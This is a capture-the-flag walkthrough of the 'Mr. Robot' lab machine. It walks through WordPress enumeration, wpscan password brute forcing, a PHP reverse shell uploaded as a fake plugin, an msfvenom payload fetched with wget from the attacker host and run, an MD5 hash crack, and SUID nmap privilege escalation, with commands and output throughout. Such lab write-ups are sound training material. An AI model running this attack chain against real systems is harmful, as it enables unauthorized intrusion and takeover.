- Start with an nmap scan of the host to find what services the box is running.
1234567891011root@kali:~# nmap -sV 172.16.27.140 -p 1-65535Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-31 15:12 EDTNmap scan report for 172.16.27.140Host is up (0.00042s latency).Not shown: 65532 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd443/tcp open ssl/http Apache httpdMAC Address: 00:0C:29:92:0C:ED (VMware)
- Checking the robots.txt file mentioned in the Nikto scan I see the following.
- Navigating to https://172.16.27.140/key-1-of-3.txt reveals the first flag.
- Turning my attention to the fsocity.dic file I see what appears to be a large file of potential usernames or passwords.I put it aside and keep it around for later.
- I start to enumerate the web server some more by running a dirb scan against it to see what hidden treasures I might find. I see several wp-* folders indicating that the website is likely a WordPress back end.
- With WordPress identified as the back end, I run a simple wpscan to see if I can find anything interesting but nothing jumps out as being the potential issue.
1wpscan --url http://172.16.27.140
- I attempt to enumerate the potential admin user to see if I can use the previously found fsocity.dic file as a wordlist file to try a brute force attack. The usual method of http://172.16.27.140/?author=1 unfortunately does not show up anything fruitful. The same is true for the enumerate users function of wpscan.I turn my attention to the password reset function of the wp-admin console login. I notice that when I try a non-valid username I get an error as such.
- This next part is at least when a little bit of the knowledge of the show is required. I try the usual suspects of admin, root, superadmin, etc…then I try elliot and receive a different error.
- I now know I have my username, though I’m not sure if it’s admin or not. I use wpscan’s brute force function, change the name of fsocity.dic (presumably the .dic stands for dictionary) to fsocity.txt just to ensure there wouldn’t be any errors, and then run my brute force attack.
123456789101112131415wpscan -u http://172.16.27.140 -U elliot -w ~/Downloads/foscity.txt -t 16[+] [SUCCESS] Login : elliot Password : ER28-0652Brute Forcing 'elliot' Time: 05:16:35 <> (858149 / 858161) 99.99% ETA: 00:00:00+----+--------+------+-----------+| Id | Login | Name | Password |+----+--------+------+-----------+| | elliot | | ER28-0652 |+----+--------+------+-----------+[+] Finished: Thu Aug 31 11:53:00 2017[+] Requests Done: 858203[+] Memory used: 19.344 MB[+] Elapsed time: 05:16:36
- With a password to log into the wordpress, I log in to discover that the elliot user is an administrator. I tried a couple times to get a meterpreter shell working to no avail, so I grabbed a PHP Reverse Shell from Pentest Monkey. I put comments at the top of the PHP File to masquerade it as a wordpress plugin, zip’ed the file and uploaded it & activated the plugin.
12345678/** Plugin Name: Shell* Plugin URI: https://hacked.com* Description: this is a hacked shell* Author: derp* Version: 1.0* Author URI: https://google.com* */
I set up a netcat listener on the port and once the plugin was activated it returned a shell to my listener.
12345678root@kali:~/Desktop# nc -nvlp 9998listening on [any] 9998 ...connect to [172.16.27.133] from (UNKNOWN) [172.16.27.140] 57500Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux00:44:49 up 1 day, 6:30, 0 users, load average: 0.24, 0.07, 0.06USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off
- With the reverse shell established I provisioned a new meterpreter shell to upload to the server to make use of the additional functionality it provides.
12345678msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.27.133 LPORT=4444 -f elf > shell.elfcp shell.elf /var/www/html/ON VICTIM COMPUTERcd /tmpwget http://172.16.27.133/shell.elfchmod 755 shell.elf./shell.elf
- During earlier enumeration I tried to access the /phpmyadmin folder and was told it was only accessible from the local host. With a meterpreter shell in place I can set up a route to hit services that were not accessible from the external machine.
12meterpreter > portfwd add -l 8181 -p 80 -r 172.16.27.140[*] Local TCP relay created: :8181 <-> 172.16.27.140:80
With the route in place I can now access the restricted phpMyAdmin page by navigating to http://127.0.0.1:8181/phpmyadmin from the attacking machine.
- Another quick bit of enumeration reveals files in the /home/robot directory, one of which is accessible to us and the other, our second key, is not.
12345678meterpreter > ls /home/robotListing: /home/robot====================Mode Size Type Last modified Name---- ---- ---- ------------- ----100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
12meterpreter > cat /home/robot/password.raw-md5robot:c3fcd3d76192e4007dfb496cca67e13b
An MD5 “decrypter” service online reveals that the password is simply abcdefghijklmnopqrstuvwxyz
- Remembering that the server was listening on TCP 21 I thought I might be able to use these credentials to log into an FTP server. There did not appear to be an FTP client available on the server, and attempting to route the traffic through a port forward prompted with a connection refused. I tried using netcat but was met with no success.
1234nc 127.0.0.1 21220 (vsFTPd 3.0.2)USER robot530 Permission denied.
- The next logical step is changing my user via the su command, though I’m met with the following error.
12su robotsu: must be run from a terminal
An easy workaround is by using the following two lines.
1234567echo "import pty; pty.spawn('/bin/bash')" > /tmp/tty.pypython /tmp/tty.pydaemon@linux:/opt/bitnami/apps/phpmyadmin/htdocs$ su robotsu robotPassword: abcdefghijklmnopqrstuvwxyzrobot@linux:/opt/bitnami/apps/phpmyadmin/htdocs$
Authenticated as the robot user I can now grab the second flag, located in /home/robot
- Running as the robot user is great, but we need to get root so it’s time to focus on privilege escalation. I downloaded the Pentest Monkey Unix-Privesc-Check onto the box using wget and receive a litany of information.
Scrolling through the warnings I see a variety of pieces of information I look into further, but the fruitful line is
12WARNING: /usr/local/bin/nmap is SUID root. /usr/local/bin/nmap contains the string /proc/net/route. The user robot can write to /proc/netChecking if anyone except root can change /usr/local/share/nmap
In essence it means that nmap runs under the root group. Abusing the (now deprecated) –interactive mode, we can obtain a root shell simply by launching nmap in interactive mode and then invoking the shell command.
12345678910# nmap --interactivenmap --interactiveStarting nmap V. 3.81 ( http://www.insecure.org/nmap/ )Welcome to Interactive Mode -- press h <enter> for helpnmap> !sh!sh# ididuid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
- Being a part of the root group now gives me access to the /root directory. With my privileged access all that’s left to do is claim the third key and call it a day.
123# cat /root/key-3-of-3.txtcat /root/key-3-of-3.txt04787ddef27c3dee1ee161b21670b4e4
All in all this was a very fun box and employed a good variety of techniques to compromise. Thanks for reading!